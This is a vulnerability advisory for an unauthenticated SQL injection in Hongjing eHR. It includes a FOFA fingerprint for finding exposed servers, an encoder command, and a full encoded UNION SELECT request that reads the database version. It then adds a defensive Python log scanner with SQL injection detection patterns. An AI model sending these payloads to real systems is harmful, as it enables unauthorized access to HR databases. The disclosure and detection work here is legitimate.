0x01 Product Introduction
Hongjing eHR is human resource management software that integrates HR management with digital applications to meet dynamic, collaborative, process-oriented and strategic requirements.
0x02 Vulnerability Overview
Hongjing eHR contains a SQL injection vulnerability. An unauthenticated remote attacker can use it to execute arbitrary SQL commands and thereby read sensitive information from the database.
0x03 Affected Versions
Hongjing eHR < 8.2
0x04 Reproduction Environment
FOFA: body='<div class="hj-hy-all-one-logo"'
0x05 Vulnerability Reproduction
PoC (the injection point is the categories parameter):
/servlet/codesettree?categories=[encoded malicious SQL]&codesetid=1&flag=c&parentid=-1&status=1
Note: the SQL statement must first be encoded with the hrms encoding scheme.
Encoding tool: https://github.com/vaycore/HrmsTool
java -jar HrmsTool.jar -e "1' union all select 'hongjing',@@version--"
Construct the payload (queries the database version):
GET /servlet/codesettree?categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d&codesetid=1&flag=c&parentid=-1&status=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Reproduced successfully.
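The encoded request above is what a defender will actually see in web server access logs, so a detection rule has to undo the encoding before any SQL keyword matching can work. The following is an added example, not part of the original advisory or of the HrmsTool project: it decodes the categories parameter and flags injection indicators over a few constructed access-log lines. It assumes, from the request shown above, that the encoding maps each non-letter character to "~" followed by two hex digits and passes letters through unchanged; the log format, IP addresses and line contents are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The PoC request encodes non-letter characters of the categories parameter
# as "~" followed by two hex digits (~27 = "'", ~20 = space, ~2d = "-").
# Assumption: letters are passed through unchanged, as in the advisory's request.
TILDE_HEX = re.compile(r"~([0-9a-fA-F]{2})")


def decode_hrms(value: str) -> str:
    """Turn '~31~27~20union' back into "1' union"."""
    return TILDE_HEX.sub(lambda m: chr(int(m.group(1), 16)), value)


# Indicators of SQL injection in the decoded value. Deliberately simple:
# the endpoint expects a plain identifier in categories, so any of these
# is already out of place.
SQLI_INDICATORS = [
    re.compile(r"(?i)\bunion\b.*\bselect\b"),  # UNION-based extraction
    re.compile(r"'"),                          # string delimiter
    re.compile(r"--|/\*"),                     # comment to discard the tail
    re.compile(r"@@\w+"),                      # server variables, e.g. @@version
]

# Request line inside a combined-format (Apache/Nginx) access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def categories_from_log_line(line: str):
    """Return the raw categories value of a codesettree request, or None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.endswith("/servlet/codesettree"):
        return None
    values = parse_qs(url.query).get("categories")
    return values[0] if values else None


def classify(raw: str):
    """Decode the parameter and return (decoded, list of indicators that fired)."""
    decoded = decode_hrms(raw)
    hits = [p.pattern for p in SQLI_INDICATORS if p.search(decoded)]
    return decoded, hits


def scan_log(lines):
    """Return (line_no, decoded_value, hits) for requests that look injected."""
    findings = []
    for n, line in enumerate(lines, 1):
        raw = categories_from_log_line(line)
        if raw is None:
            continue
        decoded, hits = classify(raw)
        if hits:
            findings.append((n, decoded, hits))
    return findings


# Constructed sample log lines: a normal request, an unrelated servlet,
# and the encoded payload from the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:09:00:00 +0800] "GET /servlet/codesettree'
    '?categories=~31&codesetid=1&flag=c&parentid=-1&status=1 HTTP/1.1" 200 812',
    '192.0.2.11 - - [01/Jan/2024:09:00:05 +0800] "GET /servlet/login HTTP/1.1" 200 310',
    '192.0.2.12 - - [01/Jan/2024:09:00:09 +0800] "GET /servlet/codesettree'
    '?categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d'
    '&codesetid=1&flag=c&parentid=-1&status=1 HTTP/1.1" 200 1204',
]

if __name__ == "__main__":
    for line_no, decoded, hits in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {decoded!r} matched {hits}")
```

Matching on the decoded string rather than the raw log text is the whole point: a rule that greps access logs for "union select" never fires here because the space and quote characters are hidden behind "~20" and "~27". The same decode step is what a WAF rule for this endpoint needs before its SQL signatures apply.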
0x06 Remediation
The vendor has released a security update for this issue; affected users should contact the vendor to obtain the patch.